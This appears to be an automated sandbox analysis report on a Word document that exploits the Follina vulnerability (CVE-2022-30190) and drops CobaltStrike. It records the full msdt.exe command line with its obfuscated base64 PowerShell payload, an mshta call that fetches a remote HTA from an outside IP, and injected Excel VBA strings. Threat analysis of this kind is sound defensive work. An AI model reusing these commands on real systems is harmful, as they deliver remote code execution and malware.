        Source: 00000019.00000003.500290954.0000000006DFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509363516.0000000005B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499838198.0000000006E5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499586408.0000000006E87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509707518.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508774998.0000000005C75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.504055585.00000000065C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508725411.0000000005CBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500355385.0000000006DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499979043.0000000006E3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000002.568622396.0000000006E13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500225710.0000000006E0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.506934087.00000000060F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.506382622.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500146207.0000000006E1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.503951630.0000000006608000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500435591.0000000006DDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500214700.0000000006E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509015844.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499330598.0000000006CBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.505281515.0000000006456000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508508228.0000000005D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507143214.0000000006072000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509189150.0000000005BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507585756.0000000005F67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.501274310.0000000006AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508358895.0000000005D63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508666437.0000000005CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500854607.0000000006B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.498808453.0000000006D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: Process Memory Space: msdt.exe PID: 7052, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
        Source: Process Memory Space: mshta.exe PID: 5852, type: MEMORYSTRMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\dllhost[1].hta, type: DROPPEDMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: DiagPackage.dll.mui.9.drStatic PE information: No import functions for PE file found
        Source: DiagPackage.dll.9.drStatic PE information: No import functions for PE file found
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: DiagPackage.dll.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagPackage.dll.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagPackage.dll.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dllJump to behavior
        Source: V3g2Pfu707.docxVirustotal: Detection: 33%
        Source: V3g2Pfu707.docxReversingLabs: Detection: 29%
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP"
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP"
        Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\system32\mshta.exe" http://159.75.135.162:61256/dllhost.hta
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.cmdline
        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP"
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\\SysWOW64\\rundll32.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exeJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP"Jump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\\SysWOW64\\rundll32.exeJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32Jump to behavior
        Source: V3g2Pfu707.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\V3g2Pfu707.docx
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{62B37E75-AE27-4D86-A250-544904017A8C} - OProcSessId.datJump to behavior
        Source: classification engineClassification label: mal92.troj.expl.evad.winDOCX@18/34@0/3
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\\SysWOW64\\rundll32.exe
        Source: mshta.exeBinary or memory string: _Application.Visible("false");_Application.Version();IWshShell3.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM");IWshShell3.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM");IWshShell3.RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\AccessVB", "1", "REG_DWORD");_Application.Workbooks();Workbooks.Add();_Workbook.VBProject();_VBProject.VBComponents();_VBComponents.Add("1");_VBComponent.CodeModule();_CodeModule.AddFromString("Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadId As LongEnd TypePrivate Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String ");_Application.DisplayAlerts("false");_Application.Run("Auto_Open");
        Source: mshta.exe, 00000019.00000003.498723453.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.511885316.000000000586C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0_Workbook.VBProject();
        Source: mshta.exe, 00000019.00000002.567767973.0000000005947000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: _Workbook.VBProject();
        Source: mshta.exe, 00000019.00000003.490927770.0000000005869000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491409974.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491157715.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491019330.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.498723453.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000002.559559685.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491309845.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.511885316.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491270423.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000002.559502075.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491220893.000000000586C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1)
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLLJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.cmdline
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.cmdline
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.cmdline

        Persistence and Installation Behavior

        barindex
        Source: document.xml.relsExtracted files from sample: http://101.33.231.81:62563/exploit.html!
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\en-US\DiagPackage.dll.muiJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\en-US\DiagPackage.dll.muiJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 61256
        Source: unknownNetwork traffic detected: HTTP traffic on port 61256 -> 49781
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ExplorerJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
